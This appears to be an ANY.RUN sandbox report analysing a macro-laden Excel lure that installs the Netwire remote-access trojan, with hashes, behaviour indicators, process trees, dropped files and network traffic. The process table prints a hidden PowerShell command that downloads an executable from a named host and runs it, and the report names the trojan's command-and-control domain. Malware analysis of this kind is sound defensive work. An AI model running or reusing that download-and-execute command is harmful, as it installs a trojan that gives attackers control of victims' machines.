2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208

Add for printing

File name:	LetterofIntent-Eckharthelicopter.xls
Full analysis:	https://app.any.run/tasks/398235d6-6d1a-465e-b96b-52122be095e1
Verdict:	Malicious activity
Threats:	Netwire is an advanced RAT — it is a malware that takes control of infected PCs and allows its operators to perform various actions. Unlike many RATs, this one can target every major operating system, including Windows, Linux, and MacOS. Malware Trends Tracker >>>
Analysis date:	July 24, 2020, 20:54:59
OS:	Windows 10 Professional (build: 16299, 64 bit)
Tags:	macros macros-on-open loader trojan netwire rat
Indicators:
MIME:	application/vnd.ms-excel
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: DAZED, Last Saved By: DAZED, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jul 24 16:01:52 2020, Last Saved Time/Date: Fri Jul 24 16:06:33 2020, Security: 0
MD5:	6CB7256DDE8C6CF09FC82B7F75FD18AD
SHA1:	9B5BB3F2FDA7A6E316A210942D0D65D1E877761D
SHA256:	2CB072D9FCC9413A91B245513366C7BB52BFEC2638F67C158520C2854E264208
SSDEEP:	12288:huj3HVAQHVxSCyGnOsDRGzg5Bi0nvGfqTuRJwWJsZSk9A+oMD1L0Nc:UXVAQ1xSp8IzgSgvqRJwWJsZSoywL0S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 660 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: on
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.431.16299.0 KB4103768
Adobe Acrobat Reader DC MUI (15.007.20033)
CCleaner (5.35)
FileZilla Client 3.31.0 (3.31.0)
Google Chrome (73.0.3683.86)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft Office Professional 2019 - de-de (16.0.12026.20264)
Microsoft Office Professional 2019 - en-us (16.0.12026.20264)
Microsoft Office Professional 2019 - es-es (16.0.12026.20264)
Microsoft Office Professional 2019 - it-it (16.0.12026.20264)
Microsoft Office Professional 2019 - ja-jp (16.0.12026.20264)
Microsoft Office Professional 2019 - ko-kr (16.0.12026.20264)
Microsoft Office Professional 2019 - pt-br (16.0.12026.20264)
Microsoft Office Professional 2019 - tr-tr (16.0.12026.20264)
Microsoft Office Professionnel 2019 - fr-fr (16.0.12026.20264)
Microsoft Office профессиональный 2019 - ru-ru (16.0.12026.20264)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (14.11.25325.0)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325 (14.11.25325)
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325 (14.11.25325)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
Notepad++ (64-bit x64) (7.5.1)
Office 16 Click-to-Run Extensibility Component (16.0.12026.20264)
Office 16 Click-to-Run Licensing Component (16.0.12026.20264)
Office 16 Click-to-Run Localization Component (16.0.12026.20264)
Opera 12.15 (12.15.1748)
QGA (2.10.81)
Skype™ 7.39 (7.39.102)
Update for Windows 10 for x64-based Systems (KB4023057) (2.19.0.0)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)
Windows 10 Upgrade Assistant (1.4.9200.22175)

Hotfixes

Client LanguagePack Package
Foundation Package
InternetExplorer Optional Package
KB4054022
KB4055237
KB4055994
KB4058043
KB4078408
KB4093110
KB4094276
KB4103729
KB4131372
KB4134661
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
NetFx3 OnDemand Package
ProfessionalEdition
QuickAssist Package
RollupFix

Add for printing

MALICIOUS
- Executes PowerShell scripts
  - cmd.exe (PID: 72)
- Starts CMD.EXE for commands execution
  - EXCEL.EXE (PID: 4580)
- Unusual execution from Microsoft Office
  - EXCEL.EXE (PID: 4580)
- Application was dropped or rewritten from another process
  - solute.exe (PID: 2752)
  - solu.exe (PID: 1740)
- Downloads executable files from the Internet
  - powershell.exe (PID: 1948)
- Changes the autorun value in the registry
  - solu.exe (PID: 1740)
- NETWIRE was detected
  - solu.exe (PID: 1740)
- Connects to CnC server
  - solu.exe (PID: 1740)
SUSPICIOUS
- Reads the machine GUID from the registry
  - powershell.exe (PID: 1948)
- Reads Environment values
  - powershell.exe (PID: 1948)
- Executable content was dropped or overwritten
  - solute.exe (PID: 2752)
  - powershell.exe (PID: 1948)
- Creates files in the user directory
  - solute.exe (PID: 2752)
- Starts itself from another location
  - solute.exe (PID: 2752)
INFO
- Reads settings of System Certificates
  - EXCEL.EXE (PID: 4580)
  - powershell.exe (PID: 1948)
- Reads Environment values
  - EXCEL.EXE (PID: 4580)
- Creates files in the user directory
  - EXCEL.EXE (PID: 4580)
- Reads the software policy settings
  - EXCEL.EXE (PID: 4580)
  - powershell.exe (PID: 1948)
- Scans artifacts that could help determine the target
  - EXCEL.EXE (PID: 4580)
- Reads the machine GUID from the registry
  - EXCEL.EXE (PID: 4580)
- Reads Microsoft Office registry keys
  - EXCEL.EXE (PID: 4580)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xls	\|	Microsoft Excel sheet (48)
.xls	\|	Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Excel 2003 Worksheet
CompObjUserTypeLen:	31
HeadingPairs:	Worksheets 1
TitleOfParts:	Sheet1
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
Company:
CodePage:	Windows Latin 1 (Western European)
Security:	None
ModifyDate:	2020:07:24 15:06:33
CreateDate:	2020:07:24 15:01:52
Software:	Microsoft Excel
LastModifiedBy:	DAZED
Author:	DAZED

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
4580	"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\LetterofIntent-Eckharthelicopter.xls"	C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE		explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 16.0.12026.20264
72	cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')	C:\WINDOWS\SYSTEM32\cmd.exe	—	EXCEL.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800)
3424	\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1	C:\WINDOWS\system32\conhost.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800)
1948	powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')	C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800)
2752	"C:\Users\admin\AppData\Local\Temp\solute.exe"	C:\Users\admin\AppData\Local\Temp\solute.exe		powershell.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XACT Build Utility Exit code: 0 Version: 9.29 (DXSDK_JUN10.100602-0421)
1740	"C:\Users\admin\AppData\Roaming\solu\solu.exe"	C:\Users\admin\AppData\Roaming\solu\solu.exe		solute.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XACT Build Utility Exit code: 0 Version: 9.29 (DXSDK_JUN10.100602-0421)

Add for printing

Total events

2 869

Read events

2 556

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
4580	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z0B3631KDJ1WL4OLCXIM.temp		—
		MD5:—	SHA256:—
4580	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms		—
		MD5:—	SHA256:—
4580	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7OJ3GWE2MNKXM9VH8HAV.temp		—
		MD5:—	SHA256:—
1948	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j5m1lfzy.0oo.ps1		—
		MD5:—	SHA256:—
1948	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x5qbth5m.rfy.psm1		—
		MD5:—	SHA256:—
4580	EXCEL.EXE	C:\Users\admin\AppData\Local\Temp\.ses		text
		MD5:C33ED3B632A8C623EA345A9B78D2524F	SHA256:7256054B34B9DD3414CA30A35507F58CC4470E9885BA2F4AB3C33C21B547EEA8
4580	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\LetterofIntent-Eckharthelicopter.xls.LNK		lnk
		MD5:0F58D7EE239E09EBC5980639C0D7EAA2	SHA256:0739146FBE5404F541B3272A1F224CBB034DA96DE5F527E8DA997E0DE508C4D5
4580	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:C9504642E06A4D3A31D20AC06ED6713A	SHA256:40F7D6FFFC2BDCD0748D0E4B405D8D03772A7DE2E378A30E3EB5EF4D19930065
1948	powershell.exe	C:\Users\admin\AppData\Local\Temp\solute.exe		executable
		MD5:91506BC2A51501164B6A2B0C18AD1C44	SHA256:B16B3D99441F078E081E2AC0A8F0121CE4DAB264BF434E353D1E00A57E54D3AA
4580	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml		xml
		MD5:AD7C7878A2A9562233909B60DDA482DD	SHA256:A76F0B3CB711829EC6B1FA57C74805610E30FDFD0A958DDF2389E4A5022AE939
2752	solute.exe	C:\Users\admin\AppData\Roaming\solu\solu.exe		executable
		MD5:91506BC2A51501164B6A2B0C18AD1C44	SHA256:B16B3D99441F078E081E2AC0A8F0121CE4DAB264BF434E353D1E00A57E54D3AA
1948	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:65BDD5145D97FA744EEF1CB6762B6F6D	SHA256:D2025033AC5B23ED2BC7B8518CE20528781835C6C4C485A0AA1BED3B388ACF4A
4580	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C0E5D08C-4B40-44F8-AC52-044B8C0E498A		xml
		MD5:A8F520B6746F3FA641A8B8342E819BCD	SHA256:94D969F5FD76CC4E8FD4ED42864FC6B7AD9B9FCBB7FC9F39E21970648A8D4B6B

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4580	EXCEL.EXE	GET	200	13.107.42.23:443	https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b61BF321D-C30A-4492-9F75-7F82F56F1BC1%7d&LabMachine=false	US	text	89.4 Kb	whitelisted
1948	powershell.exe	GET	200	45.40.135.135:80	http://hodrc.org/ot/solut.exe	US	executable	1.40 Mb	suspicious
4580	EXCEL.EXE	POST	200	52.114.128.70:443	https://self.events.data.microsoft.com/OneCollector/1.0/	US	text	9 b	whitelisted
4580	EXCEL.EXE	POST	200	52.114.128.70:443	https://self.events.data.microsoft.com/OneCollector/1.0/	US	text	56 b	whitelisted
4580	EXCEL.EXE	GET	200	52.109.76.6:443	https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3	IE	xml	124 Kb	whitelisted
4580	EXCEL.EXE	GET	200	52.109.8.19:443	https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.12026.20264&ClientId=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12026.20264&	US	xml	313 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	1.29 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/ppsecure/deviceaddcredential.srf	US	text	16.7 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	11.1 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	1.98 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	11.1 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	9.87 Kb	whitelisted
4580	EXCEL.EXE	POST	200	40.90.137.124:443	https://login.live.com/RST2.srf	US	xml	11.1 Kb	whitelisted
4580	EXCEL.EXE	POST	200	52.114.128.70:443	https://self.events.data.microsoft.com/OneCollector/1.0/	US	text	9 b	whitelisted
4580	EXCEL.EXE	GET	304	20.191.48.196:443	https://settings-win-ppe.data.microsoft.com/settings/v2.0/Storage/StorageHealthEvaluation?os=Windows&deviceClass=Windows.Desktop&appVer=1.0.0.0	US	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1948	powershell.exe	45.40.135.135:80	hodrc.org	GoDaddy.com, LLC	US	suspicious
4580	EXCEL.EXE	13.107.42.23:443	config.edge.skype.com	Microsoft Corporation	US	suspicious
4580	EXCEL.EXE	52.114.128.70:443	self.events.data.microsoft.com	Microsoft Corporation	US	unknown
4580	EXCEL.EXE	52.109.76.6:443	officeclient.microsoft.com	Microsoft Corporation	IE	whitelisted
1740	solu.exe	185.165.153.158:2022	solution.myddns.me	—	NL	malicious
4580	EXCEL.EXE	52.109.8.19:443	nexusrules.officeapps.live.com	Microsoft Corporation	US	whitelisted
3388	svchost.exe	40.90.137.124:443	login.live.com	Microsoft Corporation	US	unknown
4356	svchost.exe	20.191.48.196:443	settings-win-ppe.data.microsoft.com	Microsoft Corporation	US	unknown

DNS requests

Domain	IP	Reputation
config.edge.skype.com	13.107.42.23	whitelisted
hodrc.org	45.40.135.135	unknown
self.events.data.microsoft.com	52.114.128.70 52.114.6.47	whitelisted
solution.myddns.me	185.165.153.158	malicious
officeclient.microsoft.com	52.109.76.6	whitelisted
nexusrules.officeapps.live.com	52.109.8.19	whitelisted
login.live.com	40.90.137.124 40.90.137.125 40.90.23.247 40.90.23.153 40.90.137.126 40.90.23.206 40.90.137.120 40.90.137.127	whitelisted
settings-win-ppe.data.microsoft.com	20.191.48.196	whitelisted

Threats

PID	Process	Class	Message
1948	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
1948	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1740	solu.exe	A Network Trojan was detected	MALWARE [PTsecurity] Netwire.RAT
1740	solu.exe	A Network Trojan was detected	MALWARE [PTsecurity] Netwire.RAT
1740	solu.exe	A Network Trojan was detected	MALWARE [PTsecurity] Netwire.RAT

2 ETPRO signatures available at the full report

Add for printing

Process	Message
conhost.exe	InitSideBySide failed create an activation context. Error: 1814

General Info

LetterofIntent-Eckharthelicopter.xls

6CB7256DDE8C6CF09FC82B7F75FD18AD

9B5BB3F2FDA7A6E316A210942D0D65D1E877761D

2CB072D9FCC9413A91B245513366C7BB52BFEC2638F67C158520C2854E264208

12288:huj3HVAQHVxSCyGnOsDRGzg5Bi0nvGfqTuRJwWJsZSk9A+oMD1L0Nc:UXVAQ1xSp8IzgSgvqRJwWJsZSoywL0S

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Executes PowerShell scripts

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Application was dropped or rewritten from another process

Downloads executable files from the Internet

Changes the autorun value in the registry

NETWIRE was detected

Connects to CnC server

SUSPICIOUS

Reads the machine GUID from the registry

Reads Environment values

Executable content was dropped or overwritten

Creates files in the user directory

Starts itself from another location

INFO

Reads settings of System Certificates

Reads Environment values

Creates files in the user directory

Reads the software policy settings

Scans artifacts that could help determine the target

Reads the machine GUID from the registry

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings